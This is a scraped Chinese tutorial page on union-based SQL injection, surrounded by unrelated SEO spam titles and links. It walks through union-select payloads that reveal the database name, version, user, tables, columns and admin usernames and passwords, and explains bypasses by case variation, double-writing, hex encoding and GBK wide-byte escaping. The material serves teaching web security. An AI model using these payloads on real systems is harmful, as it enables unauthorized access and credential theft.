当前位置: 首页 > news >正文

美女做暖暖暖视频网站百度推广优化怎么做的

美女做暖暖暖视频网站,百度推广优化怎么做的,网站建设的系统简介,大型网站开发团队的美工需要什么工作经验和教育背景及薪酬联合注入的原理 在SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。 select * from person where id 1; #在person表中,筛选出id1的记录如果该id1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞…

联合注入的原理

在SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。

select * from person where id = 1; #在person表中,筛选出id=1的记录

如果该id=1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞。

数据库提供联合查询,使得可以将两条SQL查询语句的结果进行连接。务必注意:两者的字段数必须一致。

select * from person where id = 1 union select 1,2,database(),4,5;

判断联合查询语句中的字段数时,可以使用order by num 。当依次增大num时,如果出现错误,那么上 一条SQL查询语句的结果字段数就为num-1。

联合查询利用SQL注入漏洞语句:

(1)执行联合查询

select * from person where id = 1 union select 1,2,3,4,5;

(2)查询数据库名、版本号、用户信息

select * from person where id = 1 union select 1,2,database(),version(),user();

(3)查询数据表名

select * from person where id = 1 union select 1,2,(select table_name from
information_schema.tables where table_schema=database() limit 0,1),4,5;
或
select * from person where id = 1 union select 1,2,(select group_concat(table_name)
from information_schema.tables where table_schema=database()),4,5;

(4)查询字段名

select * from person where id = 1 union select 1,2,(select group_concat(column_name)
from information_schema.columns where table_name='admin'),4,5;
或
select * from person where id = 1 union select 1,2,(select group_concat(column_name)
from information_schema.columns where table_name=0x61646D696E),4,5;

(5)查询具体数据

select * from person where id = 1 union select 1,concat(username,0x5c,password),3,4,5 from admin; 
或select * from person where id = 1 union select 1,concat(username,0x5c,password),3,4,5 from admin limit 0,2;

联合注入不适用情形:

1、union关键字被完全过滤

2、页面中压根不返回查询数据

联合注入过滤绕过技巧:

1、大小写绕过

基础:在Mysql中,大小写字母的含义是一致的。如果在进行过滤提交的数据过程中,没有对大小 进行区分,那么此时就会造成大小写绕过过滤的情况。

以上代码,都只匹配到union,并没有过滤大写字母,因此可以使用 大小写绕过。

2、双写绕过

基础:在使用 preg_replace 函数过程中,默认情况下 只进行一次匹配。因此如果匹配到字符替换 为空的情况 ,就可以造成双写绕过。

以上代码,使用i 表示大小写全部匹配,此时无法使用双写绕过。但是由于preg_replace默认只匹配一次 过滤字符,因此可以使用双写绕过。

3、过滤单引号绕过 十六进制

基础:在Mysql数据库中的SQL语句,对于字符串数据必须使用引号。但是对于字符串来说,Mysql 也识别 字符串中每个字符对应的ASCII码的16进制,此时可以使用 0x16进制替换字符串。从而绕过 引号对字符串的限制。

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是: 单引号(') 双引号(") 反斜杠(\) NULL

该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

在php.ini配置文件中,开启 magic_quotes_gpc 选项,此时对于数字型注入来说,如果需要进行数 据库中数据获取,需要使用十六进制进行绕过。但是对于字符型注入来说,就需要进行逃逸引号的操 作。

4、宽字节注入原理与利用

基础:如果数据库中存储数据使用 的编码方式是 GBK,那么由于用户输入的内容会进行双字节的 组合,会导致用户输入的字节与反斜杠组合,从而逃逸引号。

宽字节注入可以说是一种逃逸引号的技巧,利用双字节组合导致注入产生。

注意有一种情况下无法使用 联合查询注入利用方式:preg_match('/union/i',$sql), 完全过滤。

http://www.sczhlp.com/news/17820/

相关文章:

  • 购物网网站建设开题报告所有的竞价托管公司
  • 老师让做网站怎么做搜索关键词分析
  • 专业营销型网站建设公司推广通
  • 网站数据库建设方案站长之家收录查询
  • 南昌网站制作公司沪深300指数
  • 上海seo方案产品优化是什么意思
  • 如东网站开发爱站网关键词挖掘机
  • 网站推广策划案关键词搜狗网页搜索
  • 安徽党组织标准化建设网站上海网站推广服务公司
  • 语音模型初创「宇生月伴」获数千万元融资;游戏 AI 陪伴逗逗发布 1.0 版,引入 RTC 实时通讯丨日报
  • 瓷爹专场!!
  • 潍坊智能建站模板推广普通话黑板报
  • 网站降权原因举三个成功的新媒体营销案例
  • 做盗版网站 国外服务器吗推广赚钱的app
  • 长春网站建设托管长沙本地推广联系电话
  • 网站开发项目可行性商业推广
  • 做团购网站需要什么资质新手小白怎么做跨境电商
  • 固安建设行政主管部门官方网站2024最火的十大新闻
  • 东莞排名seo网站关键词优化优化教程
  • 金华网站建设明细报价表百度邮箱登录入口
  • 网站建设创建江东怎样优化seo
  • 天梯网站建设制作网页的流程步骤
  • 天河区建设和水务局网站网络推广网站推广
  • 做网站需要发票吗做推广app赚钱的项目
  • 如何免费自己做个网站百度主页面
  • 自己做网站建设优化手机性能的软件
  • 标准的线程使用方案
  • sql-server如何搭建主从复制(读写分离)
  • Ollama如何让其他服务器可以通过ip访问呢
  • 东莞手机网站站定制开发外链工具xg下载